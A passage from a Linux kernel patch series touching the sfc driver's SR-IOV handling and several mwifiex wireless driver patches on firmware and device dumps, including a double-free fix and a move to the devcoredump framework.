efx_ef10_sriov_free_vf_vswitching(efx); efx->vf_count = 0; return 0; @@ -435,7 +444,7 @@ static int efx_ef10_pci_sriov_disable(struct efx_nic *efx) int efx_ef10_sriov_configure(struct efx_nic *efx, int num_vfs) { if (num_vfs == 0) - return efx_ef10_pci_sriov_disable(efx); + return efx_ef10_pci_sriov_disable(efx, false); else return efx_ef10_pci_sriov_enable(efx, num_vfs); } @@ -451,8 +460,12 @@ void efx_ef10_sriov_fini(struct efx_nic *efx) unsigned int i; int rc; - if (!nic_data->vf) + if (!nic_data->vf) { + /* Remove any un-assigned orphaned VFs */ + if (pci_num_vf(efx->pci_dev) && !pci_vfs_assigned(efx->pci_dev)) + pci_disable_sriov(efx->pci_dev); return; + } /* Remove any VFs in the host */ for (i = 0; i < efx->vf_count; ++i) { @@ -462,7 +475,7 @@ void efx_ef10_sriov_fini(struct efx_nic *efx) vf_efx->pci_dev->driver->remove(vf_efx->pci_dev); } - rc = efx_ef10_pci_sriov_disable(efx); + rc = efx_ef10_pci_sriov_disable(efx, true); if (rc) netif_dbg(efx, drv, efx->net_dev, "Disabling SRIOV was not successful rc=%d\n", rc); diff --git a/drivers/net/ethernet/sfc/ef10_sriov.h b/drivers/net/ethernet/sfc/ef10_sriov.h index ffc92a504c3f..db4ef537c610 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.h +++ b/drivers/net/ethernet/sfc/ef10_sriov.h @@ -15,6 +15,7 @@ /** * struct ef10_vf - PF's store of VF data * @efx: efx_nic struct for the current VF + * @pci_dev: the pci_dev struct for the VF, retained while the VF is assigned * @vport_id: vport ID for the VF * @vport_assigned: record whether the vport is currently assigned to the VF * @mac: MAC address for the VF, zero when address is removed from the vport @@ -22,6 +23,7 @@ */ struct ef10_vf { struct efx_nic *efx; + struct pci_dev *pci_dev; unsigned int vport_id; unsigned int vport_assigned; u8 mac[ETH_ALEN]; diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 62b213973433..0c42ed9c9e4c 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -1298,7 +1298,9 @@ static void efx_fini_io(struct efx_nic *efx) efx->membase_phys = 0; } - pci_disable_device(efx->pci_dev); + /* Don't disable bus-mastering if VFs are assigned */ + if (!pci_vfs_assigned(efx->pci_dev)) + pci_disable_device(efx->pci_dev); } void efx_set_default_rx_indir_table(struct efx_nic *efx) From e065ddb891755c74f73c60989f96784f3aa65f81 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:27 -0700 Subject: [PATCH 615/872] mwifiex: fix SDIO firmware dump problem It's been observed that firmware doesn't go back to normal state when all firmware memories are dumped. As a result, further commands are blocked. This happens due to missing driver change of writing READ DONE to control register for SDIO interface. This patch adds a missing change to fix the problem. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/sdio.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index f4b1de7977ab..a3d810b866c1 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2241,6 +2241,13 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) if (memory_size == 0) { mwifiex_dbg(adapter, DUMP, "Firmware dump Finished!\n"); + ret = mwifiex_write_reg(adapter, + card->reg->fw_dump_ctrl, + FW_DUMP_READ_DONE); + if (ret) { + mwifiex_dbg(adapter, ERROR, "SDIO write err\n"); + return; + } break; } From 0769b27739ee420a391ee66a431c1474370aec6b Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:28 -0700 Subject: [PATCH 616/872] mwifiex: fix a possible double free issue As drv_info_dump pointer doesn't get reset, we may end up freeing the allocated memory twice. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/init.c | 1 + drivers/net/wireless/mwifiex/main.c | 1 + 2 files changed, 2 insertions(+) diff --git a/drivers/net/wireless/mwifiex/init.c b/drivers/net/wireless/mwifiex/init.c index fdf38d06a0aa..df7fdc09d38c 100644 --- a/drivers/net/wireless/mwifiex/init.c +++ b/drivers/net/wireless/mwifiex/init.c @@ -435,6 +435,7 @@ mwifiex_adapter_cleanup(struct mwifiex_adapter *adapter) if (adapter->drv_info_dump) { vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; adapter->drv_info_size = 0; } diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 138c1cccf7d3..cb0097890d3f 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -886,6 +886,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) if (adapter->drv_info_dump) { vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; adapter->drv_info_size = 0; } From 38b130e22e40fd81c979952172d9a4be2e0edff9 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:29 -0700 Subject: [PATCH 617/872] mwifiex: dump driver information for PCIe interface Currently we are dumping driver information only for SDIO interface. This patch adds missing mwifiex_dump_drv_info() call for PCIe interface. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/pcie.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 7219243e9994..86ed396c88ea 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2316,6 +2316,8 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) int ret; static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; + mwifiex_dump_drv_info(adapter); + if (!card->pcie.can_dump_fw) return; From 9cc0dbf0436767f0fc24c123aa1ba3aeccd145fb Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:30 -0700 Subject: [PATCH 618/872] mwifiex: minor changes in debug messages Small letters are used in debug messages to match coding style at other places. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/main.c | 8 ++++---- drivers/net/wireless/mwifiex/sdio.c | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index cb0097890d3f..3e7774fab9b0 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -890,7 +890,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = 0; } - mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP START===\n"); + mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump start===\n"); adapter->drv_info_dump = vzalloc(MWIFIEX_DRV_INFO_SIZE_MAX); @@ -958,12 +958,12 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } if (adapter->iface_type == MWIFIEX_SDIO) { - p += sprintf(p, "\n=== SDIO register DUMP===\n"); + p += sprintf(p, "\n=== SDIO register dump===\n"); if (adapter->if_ops.reg_dump) p += adapter->if_ops.reg_dump(adapter, p); } - p += sprintf(p, "\n=== MORE DEBUG INFORMATION\n"); + p += sprintf(p, "\n=== more debug information\n"); debug_info = kzalloc(sizeof(*debug_info), GFP_KERNEL); if (debug_info) { for (i = 0; i < adapter->priv_num; i++) { @@ -978,7 +978,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } adapter->drv_info_size = p - adapter->drv_info_dump; - mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP END===\n"); + mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump end===\n"); } EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index a3d810b866c1..467ee9ad5085 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2356,7 +2356,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) if (!p) return 0; - mwifiex_dbg(adapter, MSG, "SDIO register DUMP START\n"); + mwifiex_dbg(adapter, MSG, "SDIO register dump start\n"); mwifiex_pm_wakeup_card(adapter); @@ -2428,7 +2428,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) sdio_release_host(cardp->func); - mwifiex_dbg(adapter, MSG, "SDIO register DUMP END\n"); + mwifiex_dbg(adapter, MSG, "SDIO register dump end\n"); return p - drv_buf; } From fc697159ad4c403fe0ddf226bf9a082cfecb6854 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:31 -0700 Subject: [PATCH 619/872] mwifiex: use generic name 'device dump' Currently we are dumping driver information also inside firmware dump API. We will call it as device dump and dump driver and firmware data separately. Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/README | 6 +++--- drivers/net/wireless/mwifiex/cmdevt.c | 4 ++-- drivers/net/wireless/mwifiex/debugfs.c | 20 ++++++++++---------- drivers/net/wireless/mwifiex/ethtool.c | 12 ++++++------ drivers/net/wireless/mwifiex/main.c | 4 ++-- drivers/net/wireless/mwifiex/main.h | 6 +++--- drivers/net/wireless/mwifiex/pcie.c | 22 +++++++++++++--------- drivers/net/wireless/mwifiex/sdio.c | 22 +++++++++++++--------- 8 files changed, 52 insertions(+), 44 deletions(-) diff --git a/drivers/net/wireless/mwifiex/README b/drivers/net/wireless/mwifiex/README index 31928caeeed2..2f0f9b5609d0 100644 --- a/drivers/net/wireless/mwifiex/README +++ b/drivers/net/wireless/mwifiex/README @@ -230,9 +230,9 @@ getlog cat getlog -fw_dump - This command is used to dump firmware memory into files. - Separate file will be created for each memory segment. +device_dump + This command is used to dump driver information and firmware memory + segments. Usage: cat fw_dump diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index ac89a1dd711b..a1de83fd1dbe 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -993,8 +993,8 @@ mwifiex_cmd_timeout_func(unsigned long function_context) if (adapter->hw_status == MWIFIEX_HW_STATUS_INITIALIZING) mwifiex_init_fw_complete(adapter); - if (adapter->if_ops.fw_dump) - adapter->if_ops.fw_dump(adapter); + if (adapter->if_ops.device_dump) + adapter->if_ops.device_dump(adapter); if (adapter->if_ops.card_reset) adapter->if_ops.card_reset(adapter); diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index 8895906b300e..5a0636d43a1b 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -152,24 +152,24 @@ mwifiex_info_read(struct file *file, char __user *ubuf, } /* - * Proc firmware dump read handler. + * Proc device dump read handler. * - * This function is called when the 'fw_dump' file is opened for + * This function is called when the 'device_dump' file is opened for * reading. - * This function dumps firmware memory in different files - * (ex. DTCM, ITCM, SQRAM etc.) based on the the segments for + * This function dumps driver information and firmware memory segments + * (ex. DTCM, ITCM, SQRAM etc.) for * debugging. */ static ssize_t -mwifiex_fw_dump_read(struct file *file, char __user *ubuf, - size_t count, loff_t *ppos) +mwifiex_device_dump_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) { struct mwifiex_private *priv = file->private_data; - if (!priv->adapter->if_ops.fw_dump) + if (!priv->adapter->if_ops.device_dump) return -EIO; - priv->adapter->if_ops.fw_dump(priv->adapter); + priv->adapter->if_ops.device_dump(priv->adapter); return 0; } @@ -885,7 +885,7 @@ static const struct file_operations mwifiex_dfs_##name##_fops = { \ MWIFIEX_DFS_FILE_READ_OPS(info); MWIFIEX_DFS_FILE_READ_OPS(debug); MWIFIEX_DFS_FILE_READ_OPS(getlog); -MWIFIEX_DFS_FILE_READ_OPS(fw_dump); +MWIFIEX_DFS_FILE_READ_OPS(device_dump); MWIFIEX_DFS_FILE_OPS(regrdwr); MWIFIEX_DFS_FILE_OPS(rdeeprom); MWIFIEX_DFS_FILE_OPS(memrw); @@ -913,7 +913,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(getlog); MWIFIEX_DFS_ADD_FILE(regrdwr); MWIFIEX_DFS_ADD_FILE(rdeeprom); - MWIFIEX_DFS_ADD_FILE(fw_dump); + MWIFIEX_DFS_ADD_FILE(device_dump); MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index a6b3b41d5909..c78bf0a340fb 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -71,7 +71,7 @@ mwifiex_get_dump_flag(struct net_device *dev, struct ethtool_dump *dump) struct mwifiex_adapter *adapter = priv->adapter; struct memory_type_mapping *entry; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; dump->flag = adapter->curr_mem_idx; @@ -97,7 +97,7 @@ mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, struct mwifiex_adapter *adapter = priv->adapter; struct memory_type_mapping *entry; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { @@ -109,7 +109,7 @@ mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { mwifiex_dbg(adapter, ERROR, - "firmware dump in progress!!\n"); + "device dump in progress!!\n"); return -EBUSY; } @@ -132,7 +132,7 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); struct mwifiex_adapter *adapter = priv->adapter; - if (!adapter->if_ops.fw_dump) + if (!adapter->if_ops.device_dump) return -ENOTSUPP; if (val->flag == MWIFIEX_DRV_INFO_IDX) { @@ -142,13 +142,13 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { mwifiex_dbg(adapter, ERROR, - "firmware dump in progress!!\n"); + "device dump in progress!!\n"); return -EBUSY; } if (val->flag == MWIFIEX_FW_DUMP_IDX) { adapter->curr_mem_idx = val->flag; - adapter->if_ops.fw_dump(adapter); + adapter->if_ops.device_dump(adapter); return 0; } diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 3e7774fab9b0..b7fbc2cdf0bd 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -873,7 +873,7 @@ mwifiex_tx_timeout(struct net_device *dev) } } -void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) +void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter) { void *p; char drv_version[64]; @@ -980,7 +980,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = p - adapter->drv_info_dump; mwifiex_dbg(adapter, MSG, "===mwifiex driverinfo dump end===\n"); } -EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); +EXPORT_SYMBOL_GPL(mwifiex_drv_info_dump); /* * CFG802.11 network device handler for statistics retrieval. diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 2f5516194e32..01111fe72a43 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -499,7 +499,7 @@ enum rdwr_status { }; enum mwifiex_iface_work_flags { - MWIFIEX_IFACE_WORK_FW_DUMP, + MWIFIEX_IFACE_WORK_DEVICE_DUMP, MWIFIEX_IFACE_WORK_CARD_RESET, }; @@ -789,8 +789,8 @@ struct mwifiex_if_ops { int (*init_fw_port) (struct mwifiex_adapter *); int (*dnld_fw) (struct mwifiex_adapter *, struct mwifiex_fw_image *); void (*card_reset) (struct mwifiex_adapter *); - void (*fw_dump)(struct mwifiex_adapter *); int (*reg_dump)(struct mwifiex_adapter *, char *); + void (*device_dump)(struct mwifiex_adapter *); int (*clean_pcie_ring) (struct mwifiex_adapter *adapter); void (*iface_work)(struct work_struct *work); void (*submit_rem_rx_urbs)(struct mwifiex_adapter *adapter); @@ -1484,7 +1484,7 @@ void mwifiex_hist_data_add(struct mwifiex_private *priv, u8 mwifiex_adjust_data_rate(struct mwifiex_private *priv, u8 rx_rate, u8 ht_info); -void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter); +void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter); void *mwifiex_alloc_dma_align_buf(int rx_len, gfp_t flags); void mwifiex_queue_main_work(struct mwifiex_adapter *adapter); diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 86ed396c88ea..3a9936843c21 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2305,7 +2305,7 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) } /* This function dump firmware memory to file */ -static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) +static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) { struct pcie_service_card *card = adapter->card; const struct mwifiex_pcie_card_reg *creg = card->pcie.reg; @@ -2316,8 +2316,6 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) int ret; static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; - mwifiex_dump_drv_info(adapter); - if (!card->pcie.can_dump_fw) return; @@ -2419,24 +2417,30 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) adapter->curr_mem_idx = 0; } +static void mwifiex_pcie_device_dump_work(struct mwifiex_adapter *adapter) +{ + mwifiex_drv_info_dump(adapter); + mwifiex_pcie_fw_dump(adapter); +} + static unsigned long iface_work_flags; static struct mwifiex_adapter *save_adapter; static void mwifiex_pcie_work(struct work_struct *work) { - if (test_and_clear_bit(MWIFIEX_IFACE_WORK_FW_DUMP, + if (test_and_clear_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) - mwifiex_pcie_fw_dump_work(save_adapter); + mwifiex_pcie_device_dump_work(save_adapter); } static DECLARE_WORK(pcie_work, mwifiex_pcie_work); /* This function dumps FW information */ -static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) +static void mwifiex_pcie_device_dump(struct mwifiex_adapter *adapter) { save_adapter = adapter; - if (test_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags)) + if (test_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) return; - set_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags); + set_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags); schedule_work(&pcie_work); } @@ -2673,7 +2677,7 @@ static struct mwifiex_if_ops pcie_ops = { .cleanup_mpa_buf = NULL, .init_fw_port = mwifiex_pcie_init_fw_port, .clean_pcie_ring = mwifiex_clean_pcie_ring_buf, - .fw_dump = mwifiex_pcie_fw_dump, + .device_dump = mwifiex_pcie_device_dump, }; /* diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index 467ee9ad5085..1f32c0214c82 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2177,7 +2177,7 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, } /* This function dump firmware memory to file */ -static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) +static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) { struct sdio_mmc_card *card = adapter->card; int ret = 0; @@ -2187,8 +2187,6 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) u32 memory_size; static char *env[] = { "DRIVER=mwifiex_sdio", "EVENT=fw_dump", NULL }; - mwifiex_dump_drv_info(adapter); - if (!card->can_dump_fw) return; @@ -2306,11 +2304,17 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) adapter->curr_mem_idx = 0; } +static void mwifiex_sdio_device_dump_work(struct mwifiex_adapter *adapter) +{ + mwifiex_drv_info_dump(adapter); + mwifiex_sdio_fw_dump(adapter); +} + static void mwifiex_sdio_work(struct work_struct *work) { - if (test_and_clear_bit(MWIFIEX_IFACE_WORK_FW_DUMP, + if (test_and_clear_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) - mwifiex_sdio_fw_dump_work(save_adapter); + mwifiex_sdio_device_dump_work(save_adapter); if (test_and_clear_bit(MWIFIEX_IFACE_WORK_CARD_RESET, &iface_work_flags)) mwifiex_sdio_card_reset_work(save_adapter); @@ -2330,13 +2334,13 @@ static void mwifiex_sdio_card_reset(struct mwifiex_adapter *adapter) } /* This function dumps FW information */ -static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) +static void mwifiex_sdio_device_dump(struct mwifiex_adapter *adapter) { save_adapter = adapter; - if (test_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags)) + if (test_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) return; - set_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags); + set_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags); schedule_work(&sdio_work); } @@ -2453,8 +2457,8 @@ static struct mwifiex_if_ops sdio_ops = { .cmdrsp_complete = mwifiex_sdio_cmdrsp_complete, .event_complete = mwifiex_sdio_event_complete, .card_reset = mwifiex_sdio_card_reset, - .fw_dump = mwifiex_sdio_fw_dump, .reg_dump = mwifiex_sdio_reg_dump, + .device_dump = mwifiex_sdio_device_dump, .deaggr_pkt = mwifiex_deaggr_sdio_pkt, }; From 57670ee882d4d879eb1b8e18e72173507c2a4c65 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:32 -0700 Subject: [PATCH 620/872] mwifiex: device dump support via devcoredump framework Currently device dump generated in the driver is retrieved using ethtool set/get dump commands. We will get rid of ethtool approach and use devcoredump framework. Device dump can be trigger by cat /debugfs/mwifiex/mlanX/device_dump and when the dump operation is completed, data can be read by cat /sys/class/devcoredump/devcdX/data We have prepared following script to split device dump data into multiple files. [root]# cat mwifiex_split_dump_data.sh #!/bin/bash # usage: ./mwifiex_split_dump_data.sh dump_data fw_dump_data=$1 mem_type="driverinfo ITCM DTCM SQRAM APU CIU ICU MAC" for name in ${mem_type[@]} do sed -n "/Start dump $name/,/End dump/p" $fw_dump_data > tmp.$name.log if [ ! -s tmp.$name.log ] then rm -rf tmp.$name.log else #Remove the describle info "Start dump" and "End dump" sed '1d' tmp.$name.log | sed '$d' > /data/$name.log if [ -s /data/$name.log ] then echo "generate /data/$name.log" else sed '1d' tmp.$name.log | sed '$d' > /var/$name.log echo "generate /var/$name.log" fi rm -rf tmp.$name.log fi done Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/Kconfig | 2 + drivers/net/wireless/mwifiex/ethtool.c | 99 -------------------------- drivers/net/wireless/mwifiex/main.c | 90 +++++++++++++++++++++++ drivers/net/wireless/mwifiex/main.h | 3 +- drivers/net/wireless/mwifiex/pcie.c | 21 +++--- drivers/net/wireless/mwifiex/sdio.c | 5 +- 6 files changed, 103 insertions(+), 117 deletions(-) diff --git a/drivers/net/wireless/mwifiex/Kconfig b/drivers/net/wireless/mwifiex/Kconfig index aa01c9bc77f9..48edf387683e 100644 --- a/drivers/net/wireless/mwifiex/Kconfig +++ b/drivers/net/wireless/mwifiex/Kconfig @@ -12,6 +12,7 @@ config MWIFIEX_SDIO tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897" depends on MWIFIEX && MMC select FW_LOADER + select WANT_DEV_COREDUMP ---help--- This adds support for wireless adapters based on Marvell 8786/8787/8797/8887/8897 chipsets with SDIO interface. @@ -23,6 +24,7 @@ config MWIFIEX_PCIE tristate "Marvell WiFi-Ex Driver for PCIE 8766/8897" depends on MWIFIEX && PCI select FW_LOADER + select WANT_DEV_COREDUMP ---help--- This adds support for wireless adapters based on Marvell 8766/8897 chipsets with PCIe interface. diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index c78bf0a340fb..58400c69ab26 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -64,106 +64,7 @@ static int mwifiex_ethtool_set_wol(struct net_device *dev, return 0; } -static int -mwifiex_get_dump_flag(struct net_device *dev, struct ethtool_dump *dump) -{ - struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - struct memory_type_mapping *entry; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - dump->flag = adapter->curr_mem_idx; - dump->version = 1; - if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { - dump->len = adapter->drv_info_size; - } else if (adapter->curr_mem_idx != MWIFIEX_FW_DUMP_IDX) { - entry = &adapter->mem_type_mapping_tbl[adapter->curr_mem_idx]; - dump->len = entry->mem_size; - } else { - dump->len = 0; - } - - return 0; -} - -static int -mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, - void *buffer) -{ - u8 *p = buffer; - struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - struct memory_type_mapping *entry; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { - if (!adapter->drv_info_dump) - return -EFAULT; - memcpy(p, adapter->drv_info_dump, adapter->drv_info_size); - return 0; - } - - if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - mwifiex_dbg(adapter, ERROR, - "device dump in progress!!\n"); - return -EBUSY; - } - - entry = &adapter->mem_type_mapping_tbl[adapter->curr_mem_idx]; - - if (!entry->mem_ptr) - return -EFAULT; - - memcpy(p, entry->mem_ptr, entry->mem_size); - - entry->mem_size = 0; - vfree(entry->mem_ptr); - entry->mem_ptr = NULL; - - return 0; -} - -static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) -{ - struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - if (val->flag == MWIFIEX_DRV_INFO_IDX) { - adapter->curr_mem_idx = MWIFIEX_DRV_INFO_IDX; - return 0; - } - - if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - mwifiex_dbg(adapter, ERROR, - "device dump in progress!!\n"); - return -EBUSY; - } - - if (val->flag == MWIFIEX_FW_DUMP_IDX) { - adapter->curr_mem_idx = val->flag; - adapter->if_ops.device_dump(adapter); - return 0; - } - - if (val->flag < 0 || val->flag >= adapter->num_mem_types) - return -EINVAL; - - adapter->curr_mem_idx = val->flag; - - return 0; -} - const struct ethtool_ops mwifiex_ethtool_ops = { .get_wol = mwifiex_ethtool_get_wol, .set_wol = mwifiex_ethtool_set_wol, - .get_dump_flag = mwifiex_get_dump_flag, - .get_dump_data = mwifiex_get_dump_data, - .set_dump = mwifiex_set_dump, }; diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index b7fbc2cdf0bd..3ba4e0e04223 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -982,6 +982,96 @@ void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter) } EXPORT_SYMBOL_GPL(mwifiex_drv_info_dump); +void mwifiex_upload_device_dump(struct mwifiex_adapter *adapter) +{ + u8 idx, *dump_data, *fw_dump_ptr; + u32 dump_len; + + dump_len = (strlen("========Start dump driverinfo========\n") + + adapter->drv_info_size + + strlen("\n========End dump========\n")); + + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + &adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + dump_len += (strlen("========Start dump ") + + strlen(entry->mem_name) + + strlen("========\n") + + (entry->mem_size + 1) + + strlen("\n========End dump========\n")); + } + } + + dump_data = vzalloc(dump_len + 1); + if (!dump_data) + goto done; + + fw_dump_ptr = dump_data; + + /* Dump all the memory data into single file, a userspace script will + * be used to split all the memory data to multiple files + */ + mwifiex_dbg(adapter, MSG, + "== mwifiex dump information to /sys/class/devcoredump start"); + + strcpy(fw_dump_ptr, "========Start dump driverinfo========\n"); + fw_dump_ptr += strlen("========Start dump driverinfo========\n"); + memcpy(fw_dump_ptr, adapter->drv_info_dump, 